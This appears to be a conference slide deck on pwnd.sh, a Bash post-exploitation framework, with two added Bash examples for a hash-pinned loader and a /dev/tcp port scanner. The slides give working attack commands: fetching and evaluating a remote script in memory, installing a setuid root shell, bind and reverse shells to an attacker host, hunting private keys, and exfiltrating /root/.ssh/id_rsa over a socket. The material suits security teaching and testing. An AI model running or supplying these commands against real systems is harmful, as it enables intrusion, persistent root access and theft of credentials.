
pwnd.sh


1. PWND.sh Post Exploitation Framework

2. Agenda
SCENARIO: We have already compromised a Linux machine
● What's next after exploiting
● Different functionalities of pwnd.sh
● Q/A

3. ./about_me.py
[+] Got name : Chandrapal
[+] Website : chandrapal.me
[+] Founder of : Hack with GitHub
[+] Social Accounts : @bnchandrapal @HackwithGithub
[-] Life : Traceback (most recent call last): File "about_me.py", line 150, in <module> TypeError: Can't convert 'infosec' object to developer implicitly

4. Author
Itzik Kotler (@itzikkotler), CTO & Co-founder @ SafeBreach
http://ikotler.org
5. What plans in the Post Exploitation Phase?
3 possible things:
● Further penetrate into the Network / Endpoints
● Get a firmer foothold on the Network / Endpoints
● Start exfiltrating data out of the Network / Endpoints

6. About the tool
● Newly released
● Easy to read and extend, as it is written in Bash
● Interactive, and allows you to create custom scripts
● License: 3-Clause BSD
● Both in-memory and on-disk deployment available
● Pipelines integrate pwnd.sh with other programs

7. How can I get it?
> git clone https://github.com/SafeBreach-Labs/pwndsh.git
> cd pwndsh

8. Why Bash and not Python / Perl / Ruby?
● Same Bash on different platforms (Mac, Linux, etc.) and different architectures (x86, x64)
● It is the default shell on most systems
● Bash can do socket programming when built with --enable-net-redirections (the build option that exposes /dev/tcp and /dev/udp)
● You cannot fall back to Bash from Python, Perl, etc., but you can UPGRADE to Python, Perl, etc. from Bash

9. Dependencies, or not to be depended?
● No:
– Consistent functionality across different platforms, CPUs, etc.
– Smaller and simpler code base
● Yes:
– Don't reinvent the wheel
– Everything is a dependency in shell terms (ls, cat, etc.) (Good coders create, great coders reuse)
PWND.SH is built with the least amount of dependencies

10. Why in-memory?
● Constraints found:
– Filesystem is read-only
– "No space left on device"
Solution: in-memory loading
● Works even if the filesystem is mounted read-only
● Multiple versions can co-exist (in multiple shells)
● Disappears after reboot
Caveat: only the script body stays in memory; the curl and eval commands that loaded it are still written to the shell's history file when an interactive session exits, unless history is switched off for that session.
11. Let's Start

12. Scenario:
● Attacker: Ubuntu at 192.168.70.100 ("It's me")
● Target: Metasploitable at 192.168.70.101 ("Find it")

13. In-Memory Loading Method #1
X=`curl -fsSL "https://raw.githubusercontent.com/SafeBreach-Labs/pwndsh/master/bin/pwnd.sh"`
eval "$X"

14. What if the system is on an intranet without Internet access? What if the system is in an Internet-censored country where GitHub is blocked?

15. In-Memory Loading Method #2
● On the source computer:
curl -fsSL "https://raw.githubusercontent.com/SafeBreach-Labs/pwndsh/master/bin/pwnd.sh"
<Ctrl+Shift+C>
● On the destination computer:
X="<Ctrl+V>"
eval "$X"
Caveat: a double-quoted assignment does not survive the double quotes, dollar signs and backticks that any Bash script contains; paste the text into a quoted heredoc instead so the shell takes it verbatim.

16. On-Disk Loading Method
> curl -OfsSL "https://raw.githubusercontent.com/SafeBreach-Labs/pwndsh/master/bin/pwnd.sh"
> source pwnd.sh
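All three loading methods evaluate whatever text arrived, so a download that was cut off mid-transfer, answered by a captive portal, or altered on the way runs just the same. The following is an added example, not code from pwnd.sh or from the slides: it pins the script to a SHA-256 digest recorded in advance and refuses to eval anything else. The sample script body and the pin computed from it are constructed for the demonstration; in real use the pin is a constant you audited and carried in beforehand, never derived from the download itself.

```shell
#!/usr/bin/env bash
# Added example (not from pwnd.sh): eval a fetched script only if its SHA-256
# matches a pin recorded in advance.

# sha256_hex TEXT -> hex digest of TEXT (no trailing newline is added).
sha256_hex() {
    local sum
    sum=$(printf '%s' "$1" | sha256sum)
    printf '%s' "${sum%% *}"
}

# load_pinned SCRIPT_TEXT EXPECTED_SHA256
# Evaluates SCRIPT_TEXT in the current shell and returns 0 if the digest
# matches; otherwise prints why and returns 1 without evaluating anything.
# An empty body is rejected too: that is what a failed fetch leaves in X.
load_pinned() {
    local script="$1" expected="$2" actual
    if [ -z "$script" ]; then
        echo "load_pinned: empty script (fetch failed or truncated?)" >&2
        return 1
    fi
    actual=$(sha256_hex "$script")
    if [ "$actual" != "$expected" ]; then
        echo "load_pinned: digest mismatch: got $actual, want $expected" >&2
        return 1
    fi
    eval "$script"
}

# Constructed stand-in for pwnd.sh: a script body that defines one function.
SAMPLE_SCRIPT='hello_from_payload() { echo "loaded"; }'
# The pin is computed here only so the example is self-contained; a real pin
# is a value you recorded from an audited copy, not from the download.
SAMPLE_PIN=$(sha256_hex "$SAMPLE_SCRIPT")

# With a live fetch (method #1) the call becomes:
#   X=$(curl -fsSL "$URL"); load_pinned "$X" "$PIN"
# With a paste (method #2), capture the text verbatim in a quoted heredoc:
#   X=$(cat <<'EOF'
#   ...pasted script...
#   EOF
#   ); load_pinned "$X" "$PIN"
```

The guard costs one sha256sum call and catches the two failure modes the plain eval hides: a truncated body that defines only half the functions, and a body that is not the one you audited.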
17. Scanning a Host
(pwnd)$ portscanner 192.168.2.132 22/tcp

18. Scanning Networks
(pwnd)$ for ip in $(seq 1 254); do portscanner 192.168.0.$ip 123/udp; done
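The portscanner calls above run inside pwnd.sh. To show what the socket support from slide 8 amounts to, here is an added example (not pwnd.sh code) that performs the same TCP check with nothing but Bash's /dev/tcp redirection and coreutils timeout(1); the hosts, ports and the 192.0.2 prefix in the comments are placeholders. It reports refused, filtered and unresolvable alike as closed, because a failed connect looks the same in all three cases. The UDP sweep on slide 18 has no such shortcut: opening /dev/udp/HOST/PORT succeeds whether or not anything listens, so a UDP probe has to send a protocol-specific request (an NTP packet for 123/udp) and wait for an answer.

```shell
#!/usr/bin/env bash
# Added example (not from pwnd.sh): TCP port checks using only Bash's
# /dev/tcp redirection (needs a Bash built with --enable-net-redirections).

# tcp_port_state HOST PORT [TIMEOUT_SECONDS]
# Prints "open" if a TCP connect completes within the timeout, else "closed".
# Refused, filtered (no answer) and unresolvable hosts all print "closed":
# /dev/tcp only reports whether connect() succeeded.
tcp_port_state() {
    local host="$1" port="$2" limit="${3:-2}"
    # Connect in a child Bash so a hung handshake is killed by timeout(1)
    # and the descriptor is closed when the child exits.
    if timeout "$limit" bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null; then
        echo open
    else
        echo closed
    fi
}

# scan_ports HOST PORT... -> one "PORT/tcp STATE" line per port, in order.
scan_ports() {
    local host="$1" port
    shift
    for port in "$@"; do
        printf '%s/tcp %s\n' "$port" "$(tcp_port_state "$host" "$port")"
    done
}

# sweep_subnet PREFIX PORT -> the slide 18 loop, TCP only, for PREFIX.1 through
# PREFIX.254; prints only open hosts so a /24 sweep stays readable.
# Placeholder usage: sweep_subnet 192.0.2 22
sweep_subnet() {
    local prefix="$1" port="$2" ip
    for ip in $(seq 1 254); do
        if [ "$(tcp_port_state "$prefix.$ip" "$port" 1)" = open ]; then
            printf '%s.%s %s/tcp open\n' "$prefix" "$ip" "$port"
        fi
    done
}
```

Per-port cost is bounded by the timeout, so a full /24 at one second per host is a few minutes at worst; lower the timeout on a LAN, raise it across a VPN.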
19. Local Backdoor Example
(pwnd)$ install_rootshell
# Remember to invoke rootshell with '-p': a Bash started without -p resets its effective UID to the real UID, which throws away a setuid root bit.

20. Remote Backdoor Example
(pwnd)$ bindshell 1234
# Connect to the host at 1234/tcp for a root shell

21. Remote Backdoor Example #2
# On 192.168.2.1 run: nc -l 1234
(pwnd)$ reverseshell 192.168.2.1 1234

22. Searching for Goodies
(pwnd)$ hunt_privkeys

23. Exfil Example
# On the attacker machine run: nc -l <port>
(pwnd)$ cat /root/.ssh/id_rsa | base64 | over_socket <attacker IP> <port>
24. Plugin Support
● You can create plugins and add them to the project
● All you need is:
– A GitHub account
– Bash knowledge
– Time

25. Q&A
We have HACKED WITH GITHUB

26. References
● https://github.com/SafeBreach-Labs/pwndsh
● http://www.ikotler.org/JustGotPWND.pdf
● https://www.youtube.com/watch?v=kWU-fDv2wjM

27. Thank You
